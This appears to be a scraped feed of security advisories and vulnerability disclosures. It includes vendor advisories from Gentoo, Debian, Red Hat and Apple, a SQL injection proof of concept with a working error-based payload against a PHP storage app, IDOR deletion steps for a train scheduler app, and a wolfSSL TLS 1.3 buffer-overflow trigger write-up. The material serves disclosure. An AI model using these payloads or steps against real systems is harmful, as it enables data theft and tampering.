Gentoo Linux Security Advisory 202210-31 - Multiple vulnerabilities have been discovered in OpenEXR, the worst of which could result in arbitrary code execution. Versions less than 3.1.5 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202210-31  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: OpenEXR: Multiple Vulnerabilities  
     Date: October 31, 2022  
     Bugs: #838079, #830384, #817431, #810541, #801373, #787452  
       ID: 202210-31

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in OpenEXR, the worst of  
which could result in arbitrary code execution.

Background  
==========

OpenEXR is a high dynamic-range (HDR) image file format developed by  
Industrial Light & Magic for use in computer imaging applications.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  media-libs/openexr         < 3.1.5                      >= 3.1.5

Description  
===========

Multiple vulnerabilities have been discovered in OpenEXR. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All OpenEXR users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/openexr-3.1.5"

References  
==========

[ 1 ] CVE-2021-3598  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3598  
[ 2 ] CVE-2021-3605  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3605  
[ 3 ] CVE-2021-3933  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3933  
[ 4 ] CVE-2021-3941  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3941  
[ 5 ] CVE-2021-20304  
      https://nvd.nist.gov/vuln/detail/CVE-2021-20304  
[ 6 ] CVE-2021-23169  
      https://nvd.nist.gov/vuln/detail/CVE-2021-23169  
[ 7 ] CVE-2021-45942  
      https://nvd.nist.gov/vuln/detail/CVE-2021-45942

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202210-31

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202210-31

Simple Cold Storage Management System version 1.0 suffers from a remote SQL injection vulnerability.

    # Simple Cold Storage Management System v1.0 by oretnom23 has SQL injectionBUG_Author: QiaoRui fengLogin account: admin/admin123 (Super Admin account)vendors: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.htmlThe program is built using the xmapp-php8.1 versionVulnerability File: /csms/admin/bookings/update_status.php?id=Vulnerability location: /csms/admin/bookings/update_status.php?id=, iddbname =csms_db,length=7[+] Payload: /csms/admin/bookings/update_status.php?id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id```sqlGET /csms/admin/bookings/update_status.php?id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1Host: 192.168.1.88User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Cookie: PHPSESSID=d8pesjl7i2jtmf2qddggbp7q0bConnection: close```![image](https://user-images.githubusercontent.com/54017627/191013186-8adc1c41-b13a-4d67-8590-fb6dca6d4a96.png)

Simple Cold Storage Management System 1.0 SQL Injection

Train Scheduler App version 1.0 suffers from an insecure direct object reference vulnerability.

    # Exploit Title: Train Scheduler App v1.0 - Insecure Direct Object Reference (IDOR) to "delete user id " # Exploit Author: Rohit Sharma# Vendor Name: oretnom23 # Vendor Homepage: https://www.sourcecodester.com/php/15720/train-scheduler-app-using-php-oop-and-mysql-database-free-download.html# Software Link: https://www.sourcecodester.com/php/15720/train-scheduler-app-using-php-oop-and-mysql-database-free-download.html# Version: v1.0# Tested on: window, xampp ,apachevulnerability description:- Train Scheduler App suffers from an Insecure Direct Object Reference (IDOR) vulnerabilityVulnerable Parameters:action , id how to reproduce this vulnerabilty:-1:- host this web on local host 2:- go to this url http://127.0.0.1/train_scheduler_app/3:- add random number to generate schedule list i creted alot list to testing this application 4:- go this url  http://127.0.0.1/train_scheduler_app/?action=delete&id=55:- id parameter is vulnerbale for idor change this to increasing number to delet user schedule list 5>>6>>7>>8 etc

Train Scheduler App 1.0 Insecure Direct Object Reference

Debian Linux Security Advisory 5265-1 - Several security vulnerabilities have been discovered in the Tomcat servlet and JSP engine.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5265-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
October 29, 2022                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : tomcat9  
CVE ID         : CVE-2021-43980 CVE-2022-23181 CVE-2022-29885

Several security vulnerabilities have been discovered in the Tomcat  
servlet and JSP engine.

CVE-2021-43980

    The simplified implementation of blocking reads and writes introduced in  
    Tomcat 10 and back-ported to Tomcat 9.0.47 onwards exposed a long standing  
    (but extremely hard to trigger) concurrency bug that could cause client  
    connections to share an Http11Processor instance resulting in responses, or  
    part responses, to be received by the wrong client.

CVE-2022-23181

    The fix for bug CVE-2020-9484 introduced a time of check, time of use  
    vulnerability into Apache Tomcat that allowed a local attacker to perform  
    actions with the privileges of the user that the Tomcat process is using.  
    This issue is only exploitable when Tomcat is configured to persist  
    sessions using the FileStore.

CVE-2022-29885

    The documentation of Apache Tomcat for the EncryptInterceptor incorrectly  
    stated it enabled Tomcat clustering to run over an untrusted network. This  
    was not correct. While the EncryptInterceptor does provide confidentiality  
    and integrity protection, it does not protect against all risks associated  
    with running over any untrusted network, particularly DoS risks.

For the stable distribution (bullseye), these problems have been fixed in  
version 9.0.43-2~deb11u4.

We recommend that you upgrade your tomcat9 packages.

For the detailed security status of tomcat9 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/tomcat9

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmNdoYJfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeRLxxAAzz/exjL7ERlJfqqvv1ofnRRmmJYtqaofzV8Ewb/xrFIQM8ZXohWLF9a0  
s0monZtUm+eQEKM3nYl1nXPI4l/shKnvo9yU17gcxqBgzBeYqsX9hqDm2Ie0raS7  
n22rwO4fHcQJ7vhSx2oYNL++YbEYQFEZgz+ZfiOLStHc2pIq2fxi4+jXuXHMUwuS  
KuCOYF8VLBjY87T7BT168GtKi02sIQzbXgAQSAGU6WsOvV4DLjagn/g+b1lK8F5u  
xO6rU2iM6pR73Ei2H2pb1B39BGhjorub7L2GQfiIMKf3bD7M+jflCnGq3n/xsUrO  
6PkaSCaN4DEip9V+3DBJ4TcOj0x/LzHMHimDoZ/CLI5qoPq5KWS4L7AKXM876+v5  
HIIzDH5B5INTeSEoVDkgKVx2fy8ZbaeDV+cmFTjXb+pmFpxxEuPGRYJg3Mv8PsqZ  
qPUqyrTKx8treIfXNJhJL00omDAX1T75H38BMNv56BbAHcBfszyFHHzr9uPo0+Fc  
tLYanZlx48IfCLXhOl2VcyE5up1snJmtMG1S2wFfl4btVfApGSAzAxSeYau+EGTu  
poFmm/5atf68cKEyGIuPFeNk97mqIp55gDi5lks/Cs7wW/EJndzFd/g5LwXb1HO1  
E30OhC79DT0Jlwpw3+VhS475K3XzGOhnk4x6DA1a/NtAzzaz7dg=  
=U52K  
-----END PGP SIGNATURE-----

Debian Security Advisory 5265-1

Apple Security Advisory 2022-10-27-14 - Safari 16 addresses buffer overflow, code execution, out of bounds read, and spoofing vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-10-27-14 Additional information for APPLE-SA-2022-09-12-5 Safari 16

Safari 16 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213442.

Safari Extensions  
Available for: macOS Big Sur and macOS Monterey  
Impact: A website may be able to track users through Safari web  
extensions  
Description: A logic issue was addressed with improved state  
management.  
WebKit Bugzilla: 242278  
CVE-2022-32868: Michael

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A buffer overflow issue was addressed with improved  
memory handling.  
WebKit Bugzilla: 241969  
CVE-2022-32886: P1umer, afang5472, xmzyshypnc

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
WebKit Bugzilla: 242762  
CVE-2022-32912: Jeonghoon Shin (@singi21a) at Theori working with  
Trend Micro Zero Day Initiative

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Visiting a website that frames malicious content may lead to  
UI spoofing  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 243236  
CVE-2022-32891: @real_as3617 and an anonymous researcher  
Entry updated October 27, 2022

WebKit Sandboxing  
Available for: macOS Big Sur and macOS Monterey  
Impact: A sandboxed process may be able to circumvent sandbox  
restrictions  
Description: An access issue was addressed with improvements to the  
sandbox.  
WebKit Bugzilla: 243181  
CVE-2022-32892: @18楼梦想改造家 and @jq0904 of DBAppSecurity's WeBin lab  
Entry added October 27, 2022

Safari 16 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmNbKowACgkQ4RjMIDke  
NxlCEg/+KnbktSos4M/gMt7rkcCymB4Ul4mMw0XW6eJVBL34H3XiOM9i8OoRGbg2  
F3Ft4mxRWFlzA9SgNVuvMBVHREkOdeOJ37PDtfZp9bITGAtOww8K8Ng56VxhpPem  
gs5q+veUTu95cVXDfGebwQNYtXc76+Zg/+Ju9VmhFJg0XXrjC2mzAEC8Mz2yy91b  
9otf+UeDmdBUF3eLrygVAwtXE0/swZVaRMeDu2EYFuJWl/afN+ICOrHYLxtLa9dB  
1uvw+RbOhwFRdKB010tcUUhf+M06Tp6pHPvtWHdS+Xy3RxA1d4rMzdon4TmsdEdr  
dBpOiu0EOFLMXekVosIkkvKLXAWwH5C1Ogap7IchXnc8c+rEm6Hl1QuoH4QL0krD  
P+sGYV4457e+VASkaUDEr6yxXJj+8MILm4x+7akD767qhoKvzpIfrFKY2gMnWkvK  
JNUMzPXCYLkht39KWGEJk/b/HMvlwniBmXKGDVaTG/oNcMVFyRvx81qxrNlELxcw  
lYSfP5tICA0CBWyVXYvUy1JRe15QrelLmCwpcAvAz1Edqu90sAAsPybvrPJHcZxD  
2O+parML2rVJ6zOVBg1cOddohgnJEbT3PzDW48HRV8Ub5I8WzvIKqnS+R7VWkh66  
Av8d8ElI37WY2sfIsFwXvhsIYFLZL86nel5HVEflmog2K0g/Kd0=  
=lLIK  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-10-27-14

Gentoo Linux Security Advisory 202210-30 - Multiple vulnerabilities have been discovered in the Xorg Server and XWayland, the worst of which can result in remote code execution. Versions less than 21.1.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202210-30  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: X.Org X server, XWayland: Multiple Vulnerabilities  
     Date: October 31, 2022  
     Bugs: #857780  
       ID: 202210-30

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in the Xorg Server and  
XWayland, the worst of which can result in remote code execution.

Background  
==========

The X Window System is a graphical windowing system based on a  
client/server model.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  x11-base/xorg-server       < 21.1.4                    >= 21.1.4  
  2  x11-base/xwayland          < 22.1.3                    >= 22.1.3

Description  
===========

Multiple vulnerabilities have been discovered in X.Org X server and  
XWayland. Please review the CVE identifiers referenced below for  
details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All X.Org X server users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-base/xorg-server-21.1.4"

All XWayland users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-base/xwayland-22.1.3"

References  
==========

[ 1 ] CVE-2022-2319  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2319  
[ 2 ] CVE-2022-2320  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2320

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202210-30

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202210-30

In wolfSSL versions prior to 5.5.1, malicious clients can cause a buffer overflow during a resumed TLS 1.3 handshake. If an attacker resumes a previous TLS session by sending a maliciously crafted Client Hello, followed by another maliciously crafted Client Hello. In total 2 Client Hellos have to be sent. One which pretends to resume a previous session and a second one as a response to a Hello Retry Request message.

# wolfssl before 5.5.1: CVE-2022-39173 Buffer overflow when refining  
cipher suites  
==================================================================================

## INFO  
=======

The CVE project has assigned the id CVE-2022-39173 to this issue.

Severity: high 7.5  
Affected version: before 5.5.1  
End of embargo: The embargo for this vulnerability ended 29th of September, 2022

## SUMMARY  
==========

In wolfSSL before 5.5.1 malicious clients can cause a buffer-overflow  
during a resumed TLS 1.3 handshake. If an attacker resumes a previous  
TLS session by sending a maliciously crafted Client Hello, followed by  
another maliciously crafted Client Hello. In total 2 Client Hellos  
have to be sent. One which pretends to resume a previous session and a  
second one as a response to a Hello Retry Request message.

The malicious Client Hellos contain a list of supported cipher suites,  
which contain at least `⌊sqrt(150)⌋ + 1 = 13` duplicates and less than  
150 ciphers in total. The buffer-overflow occurs in the `RefineSuites`  
function. An overflow of 44700 bytes has been confirmed. Therefore,  
large portions of the stack can get overwritten, including return  
addresses.

We confirmed the vulnerability by sending packets over TCP to a  
Wolfssl server, freshly built from the sources with the  
`--enable-session-ticket` flags (or simply `--enable-all`). We can  
provide sources for our software (tlspuffin) that produce those  
packets (and that automatically found the attack trace). The command  
given at the end of this document triggers the buffer overflow.

It is very likely that there is a way to craft an exploit which can  
cause a RCE. We have not yet created such an exploit as it would  
likely depend on the memory layout of the binary which uses wolfSSL.

Moreover, the size of the overflow can be fine-tuned in order to not  
smash the stack and continue the execution with a too large length of  
suites buffer and that will cause other routines that iterate over  
thus buffer (e.g., `FindSuiteSSL`) to misbehave. Hypothetically, this  
might be exploited to make the server use a cipher it should not  
accept such as `nullcipher` that would open up new attack vectors such  
as downgrade attacks.  
While this has not been confirmed yet, the buffer overflow itself has  
been confirmed.

## DETAILS  
==========

Line numbers below are valid for the wolfSSL Git tag  
[v5.4.0-stable](https://github.com/wolfSSL/wolfssl/tree/v5.4.0-stable).

The bug we found is in the `RefineSuites` function. In the following  
we want to explain why the function is able to overflow the `suites`  
array.  
```c  
/* Refine list of supported cipher suites to those common to server and client.  
 *  
 * ssl         SSL/TLS object.  
 * peerSuites  The peer's advertised list of supported cipher suites.  
 */  
static void RefineSuites(WOLFSSL* ssl, Suites* peerSuites)  
{  
    byte   suites[WOLFSSL_MAX_SUITE_SZ];  
    word16 suiteSz = 0;  
    word16 i, j;

    XMEMSET(suites, 0, WOLFSSL_MAX_SUITE_SZ);

    for (i = 0; i < ssl->suites->suiteSz; i += 2) {  
        for (j = 0; j < peerSuites->suiteSz; j += 2) {  
            if (ssl->suites->suites[i+0] == peerSuites->suites[j+0] &&  
                ssl->suites->suites[i+1] == peerSuites->suites[j+1]) {  
                suites[suiteSz++] = peerSuites->suites[j+0];  
                suites[suiteSz++] = peerSuites->suites[j+1];  
            }  
        }  
    }

    ssl->suites->suiteSz = suiteSz;  
    XMEMCPY(ssl->suites->suites, &suites, sizeof(suites));  
#ifdef WOLFSSL_DEBUG_TLS  
    [...]  
#endif  
}  
```  
tls13.c:4355

The `RefineSuites` function expects a `WOLFSSL` struct which contains  
a list of acceptable ciphers suites (`ssl->suites->suites`), as well  
as an array of peer cipher suites (`peerSuites`). Both inputs are  
bounded by `WOLFSSL_MAX_SUITE_SZ`, which is equal to 300 bytes or 150  
cipher suites.

Let us assume that `ssl->suites` consists of a single cipher suite  
like `TLS_AES_256_GCM_SHA384` and the `peerSuites` list contains the  
same cipher repeated thirteen times. The `RefineSuites` function will  
iterate for each element in `ssl->suites` over `peerSuites` and append  
the suite to `suites` if it is a match. The `suites` array has a  
maximum length of `WOLFSSL_MAX_SUITE_SZ == 300 bytes == 150 suites`.

With the just mentioned example input, the length of `suites` will now  
equal thirteen. The `suites` array is now copied to the `WOLFSSL`  
struct in the last line of the listing above. Therefore, `ssl->suites`  
contains now thirteen times the `TLS_AES_256_GCM_SHA384` cipher suite.

Let us now call the same `RefineSuites` function again on the modified  
`WOLFSSL` struct and the same `peerSuites` list. The `RefineSuites`  
function will iterate for each element in `ssl->suites` over  
`peerSuites` and append the suite to `suites` if it is a match.  
Because `ssl->suites` contains already 13 times the  
`TLS_AES_256_GCM_SHA384` cipher suite, in total 13 x 13 = 169 cipher  
suites are written to `suites`. 169 cipher suites require 338 bytes,  
which is more than what's available on the stack. The `suites` buffer  
overflows.

The maximum size of `peerSuites` is 150 cipher suites. Therefore, an  
overflow of 44700 bytes is possible and has been confirmed.

The buffer `ssl->suites->suites` is supposed to be reset to only  
contain the acceptable ciphers at each session start, and thus  
initially contains no duplicate. However, by provoking a `HELLO CLIENT  
RETRY REQUEST`, it is possible to make the server call `RefineSuites`  
twice as explained next.

## TRIGGERING THE BUFFER OVERFLOW  
=================================

In order to cause the above buffer-overflow, it is required to call  
`RefineSuites` twice. Malicious clients need to perform the handshake  
in a certain way to reach this situation.  
The buffer overflow at the attacked server can be obtained at least in  
the following situation:

1. Resume the previous session by sending a second Client Hello  
(`CH2`) with the following criteria:  
   - Exclude the `support_group_extension`, to cause a Hello Retry Request  
   - Include a binder which cryptographically binds this session to  
the previous one.  
   - Include a list of cipher suites that contains a repetition of `n`  
times the same cipher `c` with `13 <= n < 150`, deemed acceptable by  
the server.

   The server will parse this message, enters the state  
`SERVER_HELLO_RETRY_REQUEST_COMPLETE` and stores at least `n` times  
the cipher `c` in `ssl->suites->suites` by calling `RefineSuites`.

2. Sending a third Client Hello (`CH3`) with the same criteria as in step 2.  
   The server will parse this message and because  
`ssl->suites->suites` already contains `n` times the cipher `c`,  
`RefineSuites` will write in `suites` at least until `suites[nˆ2]`  
which overflows since `nˆ2 > 300`.

## DETAILS ABOUT STEP 1.  
========================

During step 2., we want to cause the server to perform a Hello Retry Request.

This is possible by not sending a supported group in the `CH2`. By not  
sending a support group extension, the function  
`TLSX_SupportedGroups_Find` will return false.

```c  
static int TLSX_SupportedGroups_Find(WOLFSSL* ssl, word16 name)  
{  
    ...  
        /* Check consistency now - extensions in any order. */  
        if (!TLSX_SupportedGroups_Find(ssl, clientKSE->group))  
            continue;  
    ...  
```  
tls.c:8374

This will cause clientKSE to be `NULL` and `doHelloRetry` will be set to 1.

```c  
int TLSX_KeyShare_Establish(WOLFSSL *ssl, int* doHelloRetry)  
{  
    ...  
    /* No supported group found - send HelloRetryRequest. */  
    if (clientKSE == NULL) {  
        /* Set KEY_SHARE_ERROR to indicate HelloRetryRequest required. */  
        *doHelloRetry = 1;  
        return TLSX_KeyShare_SetSupported(ssl);  
    }  
    ...  
```  
tls.c:9273

Finally, the server enters the state  
`SERVER_HELLO_RETRY_REQUEST_COMPLETE` in the function  
`VerifyServerSuite` while verifying the server suite when processing  
`CH2`.

```c  
    /* Make sure server cert/key are valid for this suite, true on success  
     * Returns 1 for valid server suite or 0 if not found  
     * For asynchronous this can return WC_PENDING_E  
     */  
    static int VerifyServerSuite(WOLFSSL* ssl, word16 idx)  
    {  
        ...  
        if (IsAtLeastTLSv1_3(ssl->version) &&  
                                      ssl->options.side == WOLFSSL_SERVER_END) {  
            int doHelloRetry = 0;  
            /* Try to establish a key share. */  
            int ret = TLSX_KeyShare_Establish(ssl, &doHelloRetry);  
            if (doHelloRetry) {  
                ssl->options.serverState = SERVER_HELLO_RETRY_REQUEST_COMPLETE;  
            }

            ...  
        }  
        ...  
```  
tls.c:30688

## DETAILS ABOUT STEP 2.  
====================

The server is now in a state in which it expects another Client Hello  
(`CH3`) from the client.

The server is now in the state `SERVER_HELLO_RETRY_REQUEST_COMPLETE`  
and will process the third ClientHello (`CH3`) with the call of  
`ProcessReply` before reaching the `TLS13_ACCEPT_SECOND_REPLY_DONE`  
state.

```c  
int wolfSSL_accept_TLSv13(WOLFSSL* ssl)  
{  
    ...  
        case TLS13_ACCEPT_FIRST_REPLY_DONE :  
            if (ssl->options.serverState ==  
                                          SERVER_HELLO_RETRY_REQUEST_COMPLETE) {  
                ssl->options.clientState = CLIENT_HELLO_RETRY;  
                while (ssl->options.clientState < CLIENT_HELLO_COMPLETE) {  
                    if ((ssl->error = ProcessReply(ssl)) < 0) {  
                        WOLFSSL_ERROR(ssl->error);  
                        return WOLFSSL_FATAL_ERROR;  
                    }  
                }  
            }

            ssl->options.acceptState = TLS13_ACCEPT_SECOND_REPLY_DONE;  
            WOLFSSL_MSG("accept state ACCEPT_SECOND_REPLY_DONE");  
            FALL_THROUGH;  
    ...  
```  
tls13.c:10909

## VULNERABILITY VARIANTS  
=========================

### Adjusting the overflow  
Note that the length of the list of ciphers in `CH2` does not  
necessarily have to be the same as the one of `CH1` and can be  
adjusted to fine-tune the size of the overflow.

### Make the server parse `CH2`  
Note also that, on the contrary to `CH1`, `CH2` does not necessarily  
have to put the server in the `SERVER_HELLO_RETRY_REQUEST_COMPLETE`  
state (which should be forbidden by the TLS 1.3 RFC) or make it return  
an error, and can thus contain a supported group, which could be  
included to possibly make the server continue the processing of `CH2`  
without returning an error.  
We have confirmed that we can make the server parses `CH2` until the  
end and starts computing a Server Hello with `ssl->suites->suiteSz`  
that exceeds 300.

### Resuming an existent session  
It is also possible to trigger the vulnerability by trying to resume  
an existent and genuine session established through a full initial  
handshake (step 0.):  
0. Sending an initial genuine Client Hello (`CH1`) to the server and  
then completing a full handshake, thus establishing a PSK.

## EXPLOITATION  
===============

We suspect that it is possible to craft an exploit which could lead to  
RCE if any of the above bytes coincides with the memory address of  
executable code. Depending on the memory layout of the binary it could  
be possible to gain RCE.  
More bytes could be used to overflow `suites` if more ciphers were  
configured to be accepted with the server, e.g., with options like  
`--enable-blake2`.

We confirmed that this could also be exploited to smash the stack and  
cause the server to crash with a segmentation fault by using a large  
list of ciphers.

Finally, by fine-tuning the length of the overflow and by including  
the supported group in `CH3`, it could be possible to make the server  
process `CH3` with a `ssl->suites->suites->suiteSz` value that exceeds  
300. This way, routines like `FindSuiteSSL` that will iterate over  
`ssl->suites->suites` (allocated on 300 bytes) until  
`ssl->suites->suiteSz` (>300) will also iterate over bytes that  
contain other fields such as `ssl->suites->hashSigAlgo`. It is likely  
that this could be exploited to make such routines return arbitrary  
values. For example, it might be exploited to make the server use a  
cipher it should not accept such as `nullcipher`; thus breaking  
confidentiality.

## FURTHER CONCERNS  
==================

We observed that the server is accepting the `CH2` Client Hello  
message and issues a Hello Retry Request, even though `CH2` does not  
contain supported groups. Clients are not allowed to add the supported  
groups extension in the retry Client Hello (`CH3`) according to the  
RFC 8446 in section  
[4.1.2](https://www.rfc-editor.org/rfc/rfc8446#section-4.1.2). The  
addition of supported groups is not allowed when retrying the Client  
Hello.  
We suggest aborting the handshake when receiving `CH2` instead of  
offering the client a retry.

wolfSSL Buffer Overflow

Red Hat Security Advisory 2022-7261-01 - OpenShift API for Data Protection enables you to back up and restore application resources, persistent volume data, and internal container images to external backup storage. OADP enables both file system-based and snapshot-based backups for persistent volumes. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift API for Data Protection (OADP) 1.0.5 security and bug fix update  
Advisory ID:       RHSA-2022:7261-01  
Product:           OpenShift API for Data Protection  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7261  
Issue date:        2022-10-31  
CVE Names:         CVE-2022-21698 CVE-2022-34903 CVE-2022-40674   
=====================================================================

1. Summary:

OpenShift API for Data Protection (OADP) 1.0.5 is now available.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

OpenShift API for Data Protection (OADP) enables you to back up and restore  
application resources, persistent volume data, and internal container  
images to external backup storage. OADP enables both file system-based and  
snapshot-based backups for persistent volumes.

Security Fix(es):

* prometheus/client_golang: Denial of service using  
InstrumentHandlerCounter (CVE-2022-21698)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter

5. JIRA issues fixed (https://issues.jboss.org/):

OADP-801 - Openshift plugin does not add Migration Plan labels on all resources  
OADP-812 - openshift-adp-controller-manager should not continuously log once dpa reaches reconciled  
OADP-823 - Check OADP and Openshift Versions and warn / error on compatibility  
OADP-829 - Registry pod going in crashloopbackoff state

6. References:

https://access.redhat.com/security/cve/CVE-2022-21698  
https://access.redhat.com/security/cve/CVE-2022-34903  
https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY1/FydzjgjWX9erEAQgYvA/+IvvS65fmrIxTJSogT1oGiu2BE/rD6Rgo  
gYPPBC5Rm/eYTqhbzubugXydg8TgFlkIrmsWCz4hIG+QtQtXMDfQDu2PSxMUcBJK  
KnSa9eb0lKQOIRclqCMmVnA2NR7NQ54WPf7mBqzznl8BujT2LJ3pcscDHsWCf7Yn  
3Spgmrg6Ix3OJ3qM5h0l4xwQDubo14KkzcULCbhAyc0Kpx3Zq+C9tk8SwGQCrYZ+  
1cpoBGOw3x8EIZQDxB2FdiaPviPX1WkpcfghCE9ap/xbATx2ccUP+odDAiY1TLBM  
hcz1KguMZsTtK5uSvl+FytaV/E0c3qNvYQgj65dxAO+9SFrOCoR9+A9l965L/vGG  
cRJR+vSE0JmNsiPExvdqz5rFH5dP3Cdmx7m/7BM2OLoS4q5R+D5h5vrT85zxnAl5  
XXYikoSEO0C1eVRES+R5y4JFFApWDZF6TTe0bPNUXYulnJF75HbshqMW0UFGxRHG  
AwaChp/Pdhfjve9atV+0YO89cSFfovCaTxO95VkTswF0ZpK84VLKj1LMBoVJy3hU  
ef5hdDB76hrLpvx2qXcDxy0wGKgf3dhf4Hjx3Ub9S0OiAcRg4EFZgi4JG1OkuDEF  
K5x3VfONIEYG0e7ymDwY2VWHDjWBakts4Yg/AyD801iq/VR6M9eAG8fQUbwQxbYP  
0zkb+rGxrBY=  
=wK59  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7261-01

Apple Security Advisory 2022-10-27-13 - watchOS 9 addresses buffer overflow, bypass, code execution, out of bounds read, out of bounds write, spoofing, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-10-27-13 watchOS 9

watchOS 9 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213486.

Accelerate Framework  
Available for: Apple Watch Series 4 and later  
Impact: Processing a maliciously crafted image may lead to arbitrary  
code execution  
Description: A memory consumption issue was addressed with improved  
memory handling.  
